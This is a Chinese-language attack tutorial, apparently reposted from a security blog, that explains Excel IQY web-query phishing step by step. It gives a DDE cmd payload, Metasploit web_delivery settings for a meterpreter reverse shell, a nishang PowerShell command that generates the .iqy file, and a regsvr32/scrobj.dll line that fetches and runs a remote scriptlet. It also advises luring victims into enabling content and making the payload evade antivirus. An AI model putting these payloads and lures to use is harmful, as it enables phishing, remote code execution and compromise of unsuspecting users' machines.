Excel的IYQ钓鱼

0x00 环境准备

1、操作系统：windows7
2、microsoft office版本：office 2010

0x01 了解IYQ的基本概念

可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’（不能加载脚本），通过IQY【即web查询】语句，可以直接将各类web上的列表数据轻松引入到当前的excel中，而正是因为这样，从而给了我们利用excel制作钓鱼邮件的机会，假如你要引入的web数据是入侵者事先准备好的一段payload iqy恶意代码，那结果就不言而喻了。

0x02 利用IYQ弹出计算器测试

一、在我们自己的服务器的网站目录下放一个payload.html文件，内容是IYQ代码

# IYQ代码     

 =cmd|'/c calc.exe '!A0

检验一下正常访问

接下来就是设置excel来拉取我们自己服务器上的payload文件

导入

点击“确定”

点击“是”过后，计算器程序被正常执行弹出

0x03 利用IYQ钓鱼弹shell测试

1、利用工具：

nishang：https://github.com/samratashok/nishang/releases

2、在kali攻击机下准备好MSF的payload

use exploit/multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse_tcp_rc4_dns
set lhost 192.168.3.29
set lport 53
set rc4password secquan.org
exploit -j

3、利用Out-WebQuery脚本来生成iqy文件

iqy文件本身的内容很简单，只有一个包含恶意payload的url：http://192.168.80.131/meter.html ，关键也就在这个 html,我们需要把 html 的内容换成加载我们上面准备好的 meterpreter payload 的 iqy 语句 ：regsvr32 /s /n /u /i:http://192.168.80.131:8080/ZXMgstpzpYQCJ.sct scrobj.dll），具体操作如下：
再用本次用来制作钓鱼文件的系统windown7执行如下命令：

powershell –exec bypass –Command "& {Import-Module 'C:\tools\nishang\Client\Out-WebQuery.ps1';Out-WebQuery -URL http://192.168.80.131/meter.html}"

命令成功执行过后，会新生成一个iqy文件

打开我们的web服务器，在根目录下创建一个meter.html文件，并在其中写入msf生成的payload构造的iqy代码

root@kali:~# /etc/init.d/apache2 start

root@kali:~# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl): apache2.service.
root@kali:~# cd /var/www/html/
root@kali:/var/www/html# vim meter.html
root@kali:/var/www/html# cat meter.html
=cmd|'/c regsvr32 /s /n /u /i:http://192.168.80.131:8080/ZXMgstpzpYQCJ.sct scrobj.dll '!A0

0x03 反弹shell

接下来就是引诱用户点击包含有IYQ漏洞的文件，一旦他正常双击打开[默认会调用 excel 来打开],便会弹出如下的安全警告框,至于怎么让他去点' enable '就需要用心好好琢磨下了

因为我们前面的 iqy 是用 cmd 执行的,所以这里它会问你是否要启动 cmd.exe,只要目标点击' 是',我们的 meterpreter 即会正常上线,具体如下

回到Kali的MSF上

发现meterpreter已成功上线

0x04 注意事项

• 实战中用 Out-WebQuery.ps1 脚本直接去生成 iqy,还有些不够灵活,如果能在 iqy 中先添加一些正常数据,看上去肯定会更逼真,自己多次实测暂未成功,待后续找到完美的解决办法之后,再更新上来

• 部分 AV,会侦测到此类的攻击,请务必做好相关免杀

文章转载至

https://www.cnblogs.com/ldhbetter/p/10893535.html

https://mp.weixin.qq.com/s?__biz=MzI2OTMzNjg4OQ==&mid=2247484505&idx=1&sn=29d2f7361662989f6a2e80b2966c228c&chksm=eae0ac0fdd972519a6de2d8fe87b82f22a6b50788bbb085265a94605e632a45ae1af36496509&mpshare=1&scene=1&srcid=&pass_ticket=MPX4KDSGdfDiM0ypnbycFFTT4KViy3PsSnmNfCGvvGQuUh9l9ubnX%2FJubb8YDmQy#rd

文章作者：

文刀问道（www.secquan.org）